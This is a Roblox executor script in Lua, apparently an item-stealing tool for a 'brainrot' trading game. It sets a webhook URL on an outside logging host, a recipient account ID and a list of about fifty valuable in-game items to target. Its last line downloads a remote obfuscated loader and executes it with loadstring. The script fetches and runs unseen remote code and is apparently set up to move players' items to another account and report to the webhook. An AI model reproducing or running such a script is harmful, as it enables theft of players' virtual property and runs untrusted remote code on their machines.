getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_0e130388021946418c5da8f3c5cf2900"
getgenv().TARGET_ID = 7100282669
getgenv().DELAY_STEP = 1
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Chipso and Queso"] = true,
    ["Cooki and Milki"] = true,
    ["Dragon Cannelloni"] = true,
    ["Dragon Gingerini"] = true,
    ["Fragrama and Chocrama"] = true,
    ["Garama and Madundung"] = true,
    ["Ginger Gerat"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Bros"] = true,
    ["Ketupat Kepat"] = true,
    ["La Casa Boo"] = true,
    ["La Supreme Combinasion"] = true,
    ["Lavadorito Spinito"] = true,
    ["Los 25"] = true,
    ["Los 67"] = true,
    ["Los Bros"] = true,
    ["Los Candies"] = true,
    ["Los Combinacionas"] = true,
    ["Los Hotspositos"] = true,
    ["Los Mobiles"] = true,
    ["Los Primos"] = true,
    ["Los Puggies"] = true,
    ["Los Sekolahs"] = true,
    ["Los Spaghettis"] = true,
    ["Los Tacoritas"] = true,
    ["Las Sis"] = true,
    ["Meowl"] = true,
    ["Mietetera Bicicletera"] = true,
    ["Money Money Reindeer"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["Reinito Sleighito"] = true,
    ["Rosey and Teddy"] = true,
    ["Skibidi Toilet"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Spooky and Pumpky"] = true,
    ["Strawberry Elephant"] = true,
    ["Swag Soda"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Tralaledon"] = true,
    ["La Secret Combinasion"] = true,
    ["La Jolly Grande"] = true,
    ["La Spooky Grande"] = true,
    ["La Extinct Grande"] = true,
    ["Esok Sekolah"] = true,
    ["Bacuru and Egguru"] = true 
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()